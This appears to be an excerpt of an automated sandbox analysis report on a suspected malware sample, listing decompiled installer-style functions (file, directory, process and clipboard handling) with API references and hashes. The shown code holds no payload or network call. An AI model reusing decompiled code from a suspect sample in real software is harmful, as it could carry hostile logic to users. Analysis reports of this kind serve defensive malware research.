                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                      • String ID:
                      • API String ID: 2547128583-0
                      • Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                      • Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
                      • Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
                      • Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 68%
                      			E00406158(WCHAR* _a4, long _a8, long _a12) {
                      				signed int _t5;
                      				void* _t6;
                      
                      				_t5 = GetFileAttributesW(_a4); // executed
                      				asm("sbb ecx, ecx");
                      				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                      				return _t6;
                      			}





                      0x0040615c
                      0x00406169
                      0x0040617e
                      0x00406184

                      APIs
                      • GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\fyTwP4SHWF.exe,80000000,00000003), ref: 0040615C
                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: File$AttributesCreate
                      • String ID:
                      • API String ID: 415043291-0
                      • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                      • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                      • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                      • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00406133(WCHAR* _a4) {
                      				signed char _t3;
                      				signed char _t7;
                      
                      				_t3 = GetFileAttributesW(_a4); // executed
                      				_t7 = _t3;
                      				if(_t7 != 0xffffffff) {
                      					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                      				}
                      				return _t7;
                      			}





                      0x00406138
                      0x0040613e
                      0x00406143
                      0x0040614c
                      0x0040614c
                      0x00406155

                      APIs
                      • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                      • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: AttributesFile
                      • String ID:
                      • API String ID: 3188754299-0
                      • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                      • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                      • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                      • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E00405C16(WCHAR* _a4) {
                      				int _t2;
                      
                      				_t2 = CreateDirectoryW(_a4, 0); // executed
                      				if(_t2 == 0) {
                      					return GetLastError();
                      				}
                      				return 0;
                      			}




                      0x00405c1c
                      0x00405c24
                      0x00000000
                      0x00405c2a
                      0x00000000

                      APIs
                      • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00405C1C
                      • GetLastError.KERNEL32 ref: 00405C2A
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: CreateDirectoryErrorLast
                      • String ID:
                      • API String ID: 1375471231-0
                      • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                      • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                      • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                      • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E0040620A(void* _a4, void* _a8, long _a12) {
                      				int _t7;
                      				long _t11;
                      
                      				_t11 = _a12;
                      				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                      				if(_t7 == 0 || _t11 != _a12) {
                      					return 0;
                      				} else {
                      					return 1;
                      				}
                      			}





                      0x0040620e
                      0x0040621e
                      0x00406226
                      0x00000000
                      0x0040622d
                      0x00000000
                      0x0040622f

                      APIs
                      • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040CF2C,0040CEF0,00403579,0040CEF0,0040CF2C,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: FileWrite
                      • String ID:
                      • API String ID: 3934441357-0
                      • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                      • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                      • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                      • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004061DB(void* _a4, void* _a8, long _a12) {
                      				int _t7;
                      				long _t11;
                      
                      				_t11 = _a12;
                      				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                      				if(_t7 == 0 || _t11 != _a12) {
                      					return 0;
                      				} else {
                      					return 1;
                      				}
                      			}





                      0x004061df
                      0x004061ef
                      0x004061f7
                      0x00000000
                      0x004061fe
                      0x00000000
                      0x00406200

                      APIs
                      • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: FileRead
                      • String ID:
                      • API String ID: 2738559852-0
                      • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                      • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                      • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                      • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 100%
                      			E004035F8(long _a4) {
                      				long _t2;
                      
                      				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                      				return _t2;
                      			}




                      0x00403606
                      0x0040360c

                      APIs
                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: FilePointer
                      • String ID:
                      • API String ID: 973152223-0
                      • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                      • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                      • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                      • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 78%
                      			E00401FA4() {
                      				void* _t9;
                      				char _t13;
                      				void* _t15;
                      				void* _t17;
                      				void* _t20;
                      				void* _t22;
                      
                      				_t19 = E00402DA6(_t15);
                      				E004056CA(0xffffffeb, _t7);
                      				_t9 = E00405C4B(_t19); // executed
                      				_t20 = _t9;
                      				if(_t20 == _t15) {
                      					 *((intOrPtr*)(_t22 - 4)) = 1;
                      				} else {
                      					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                      						_t13 = E00406AE0(_t17, _t20); // executed
                      						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                      							if(_t13 != _t15) {
                      								 *((intOrPtr*)(_t22 - 4)) = 1;
                      							}
                      						} else {
                      							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
                      						}
                      					}
                      					_push(_t20);
                      					CloseHandle();
                      				}
                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
                      				return 0;
                      			}









                      0x00401faa
                      0x00401faf
                      0x00401fb5
                      0x00401fba
                      0x00401fbe
                      0x0040292e
                      0x00401fc4
                      0x00401fc7
                      0x00401fca
                      0x00401fd2
                      0x00401fe1
                      0x00401fe3
                      0x00401fe3
                      0x00401fd4
                      0x00401fd8
                      0x00401fd8
                      0x00401fd2
                      0x00401fea
                      0x00401feb
                      0x00401feb
                      0x00402c2d
                      0x00402c39

                      APIs
                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                        • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                        • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                        • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                        • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                        • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                        • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                        • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                        • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                        • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                        • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                      • String ID:
                      • API String ID: 2972824698-0
                      • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                      • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                      • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                      • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 95%
                      			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                      				struct HWND__* _v8;
                      				long _v12;
                      				struct tagRECT _v28;
                      				void* _v36;
                      				signed int _v40;
                      				int _v44;
                      				int _v48;
                      				signed int _v52;
                      				int _v56;
                      				void* _v60;
                      				void* _v68;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				struct HWND__* _t94;
                      				long _t95;
                      				int _t100;
                      				void* _t108;
                      				intOrPtr _t130;
                      				struct HWND__* _t134;
                      				int _t156;
                      				int _t159;
                      				struct HMENU__* _t164;
                      				struct HWND__* _t168;
                      				struct HWND__* _t169;
                      				int _t171;
                      				void* _t172;
                      				short* _t173;
                      				short* _t175;
                      				int _t177;
                      
                      				_t169 =  *0x429244;
                      				_t156 = 0;
                      				_v8 = _t169;
                      				if(_a8 != 0x110) {
                      					if(_a8 == 0x405) {
                      						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                      					}
                      					if(_a8 != 0x111) {
                      						L17:
                      						_t171 = 1;
                      						if(_a8 != 0x404) {
                      							L25:
                      							if(_a8 != 0x7b) {
                      								goto L20;
                      							}
                      							_t94 = _v8;
                      							if(_a12 != _t94) {
                      								goto L20;
                      							}
                      							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                      							_a8 = _t95;
                      							if(_t95 <= _t156) {
                      								L36:
                      								return 0;
                      							}
                      							_t164 = CreatePopupMenu();
                      							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                      							_t100 = _a16;
                      							_t159 = _a16 >> 0x10;
                      							if(_a16 == 0xffffffff) {
                      								GetWindowRect(_v8,  &_v28);
                      								_t100 = _v28.left;
                      								_t159 = _v28.top;
                      							}
                      							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                      								_v60 = _t156;
                      								_v48 = 0x423748;
                      								_v44 = 0x1000;
                      								_a4 = _a8;
                      								do {
                      									_a4 = _a4 - 1;
                      									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                      								} while (_a4 != _t156);
                      								OpenClipboard(_t156);
                      								EmptyClipboard();
                      								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                      								_a4 = _t108;
                      								_t172 = GlobalLock(_t108);
                      								do {
                      									_v48 = _t172;
                      									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                      									 *_t173 = 0xd;
                      									_t175 = _t173 + 2;
                      									 *_t175 = 0xa;
                      									_t172 = _t175 + 2;
                      									_t156 = _t156 + 1;
                      								} while (_t156 < _a8);
                      								GlobalUnlock(_a4);
                      								SetClipboardData(0xd, _a4);
                      								CloseClipboard();
                      							}
                      							goto L36;
                      						}
                      						if( *0x42922c == _t156) {
                      							ShowWindow( *0x42a268, 8);
                      							if( *0x42a2ec == _t156) {
                      								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
                      							}
                      							E0040459D(_t171);
                      							goto L25;
                      						}
                      						 *0x421f18 = 2;
                      						E0040459D(0x78);
                      						goto L20;
                      					} else {
                      						if(_a12 != 0x403) {
                      							L20:
                      							return E0040462B(_a8, _a12, _a16);
                      						}
                      						ShowWindow( *0x429230, _t156);
                      						ShowWindow(_t169, 8);
                      						E004045F9(_t169);
                      						goto L17;
                      					}
                      				}
                      				_v52 = _v52 | 0xffffffff;
                      				_v40 = _v40 | 0xffffffff;
                      				_t177 = 2;
                      				_v60 = _t177;
                      				_v56 = 0;
                      				_v48 = 0;
                      				_v44 = 0;
                      				asm("stosd");
                      				asm("stosd");
                      				_t130 =  *0x42a270;
                      				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                      				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                      				 *0x429230 = GetDlgItem(_a4, 0x403);
                      				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                      				_t134 = GetDlgItem(_a4, 0x3f8);
                      				 *0x429244 = _t134;
                      				_v8 = _t134;
                      				E004045F9( *0x429230);
                      				 *0x429234 = E00404F52(4);
                      				 *0x42924c = 0;
                      				GetClientRect(_v8,  &_v28);
                      				_v52 = _v28.right - GetSystemMetrics(_t177);
                      				SendMessageW(_v8, 0x1061, 0,  &_v60);
                      				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                      				if(_a8 >= 0) {
                      					SendMessageW(_v8, 0x1001, 0, _a8);
                      					SendMessageW(_v8, 0x1026, 0, _a8);
                      				}
                      				if(_a12 >= _t156) {
                      					SendMessageW(_v8, 0x1024, _t156, _a12);
                      				}
                      				_push( *((intOrPtr*)(_a16 + 0x30)));
                      				_push(0x1b);
                      				E004045C4(_a4);
                      				if(( *0x42a278 & 0x00000003) != 0) {
                      					ShowWindow( *0x429230, _t156);
                      					if(( *0x42a278 & 0x00000002) != 0) {
                      						 *0x429230 = _t156;
                      					} else {
                      						ShowWindow(_v8, 8);
                      					}
                      					E004045F9( *0x429228);
                      				}
                      				_t168 = GetDlgItem(_a4, 0x3ec);
                      				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                      				if(( *0x42a278 & 0x00000004) != 0) {
                      					SendMessageW(_t168, 0x409, _t156, _a12);
                      					SendMessageW(_t168, 0x2001, _t156, _a8);
                      				}
                      				goto L36;
                      			}

































                      0x00405811
                      0x00405817
                      0x00405821
                      0x00405824
                      0x004059ba
                      0x004059de
                      0x004059de
                      0x004059f1
                      0x00405a0f
                      0x00405a11
                      0x00405a19
                      0x00405a6f
                      0x00405a73
                      0x00000000
                      0x00000000
                      0x00405a75
                      0x00405a7b
                      0x00000000
                      0x00000000
                      0x00405a85
                      0x00405a8d
                      0x00405a90
                      0x00405b92
                      0x00000000
                      0x00405b92
                      0x00405a9f
                      0x00405aaa
                      0x00405ab3
                      0x00405abe
                      0x00405ac1
                      0x00405aca
                      0x00405ad0
                      0x00405ad3
                      0x00405ad3
                      0x00405aeb
                      0x00405af4
                      0x00405af7
                      0x00405afe
                      0x00405b05
                      0x00405b0d
                      0x00405b0d
                      0x00405b24
                      0x00405b24
                      0x00405b2b
                      0x00405b31
                      0x00405b3d
                      0x00405b44
                      0x00405b4d
                      0x00405b4f
                      0x00405b52
                      0x00405b61
                      0x00405b64
                      0x00405b6a
                      0x00405b6b
                      0x00405b71
                      0x00405b72
                      0x00405b73
                      0x00405b7b
                      0x00405b86
                      0x00405b8c
                      0x00405b8c
                      0x00000000
                      0x00405aeb
                      0x00405a21
                      0x00405a51
                      0x00405a59
                      0x00405a64
                      0x00405a64
                      0x00405a6a
                      0x00000000
                      0x00405a6a
                      0x00405a25
                      0x00405a2f
                      0x00000000
                      0x004059f3
                      0x004059f9
                      0x00405a34
                      0x00000000
                      0x00405a3d
                      0x00405a02
                      0x00405a07
                      0x00405a0a
                      0x00000000
                      0x00405a0a
                      0x004059f1
                      0x0040582a
                      0x0040582e
                      0x00405836
                      0x0040583a
                      0x0040583d
                      0x00405840
                      0x00405843
                      0x00405846
                      0x00405847
                      0x00405848
                      0x00405861
                      0x00405864
                      0x0040586e
                      0x0040587d
                      0x00405885
                      0x0040588d
                      0x00405892
                      0x00405895
                      0x004058a1
                      0x004058aa
                      0x004058b3
                      0x004058d5
                      0x004058db
                      0x004058ec
                      0x004058f1
                      0x004058ff
                      0x0040590d
                      0x0040590d
                      0x00405912
                      0x00405920
                      0x00405920
                      0x00405925
                      0x00405928
                      0x0040592d
                      0x00405939
                      0x00405942
                      0x0040594f
                      0x0040595e
                      0x00405951
                      0x00405956
                      0x00405956
                      0x0040596a
                      0x0040596a
                      0x0040597e
                      0x00405987
                      0x00405990
                      0x004059a0
                      0x004059ac
                      0x004059ac
                      0x00000000

                      APIs
                      • GetDlgItem.USER32 ref: 00405867
                      • GetDlgItem.USER32 ref: 00405876
                      • GetClientRect.USER32 ref: 004058B3
                      • GetSystemMetrics.USER32 ref: 004058BA
                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                      • ShowWindow.USER32(?,00000008), ref: 00405956
                      • GetDlgItem.USER32 ref: 00405977
                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                      • GetDlgItem.USER32 ref: 00405885
                        • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                      • GetDlgItem.USER32 ref: 004059C9
                      • CreateThread.KERNEL32 ref: 004059D7
                      • CloseHandle.KERNEL32(00000000), ref: 004059DE
                      • ShowWindow.USER32(00000000), ref: 00405A02
                      • ShowWindow.USER32(?,00000008), ref: 00405A07
                      • ShowWindow.USER32(00000008), ref: 00405A51
                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                      • CreatePopupMenu.USER32 ref: 00405A96
                      • AppendMenuW.USER32 ref: 00405AAA
                      • GetWindowRect.USER32 ref: 00405ACA
                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                      • OpenClipboard.USER32(00000000), ref: 00405B2B
                      • EmptyClipboard.USER32 ref: 00405B31
                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                      • GlobalLock.KERNEL32 ref: 00405B47
                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
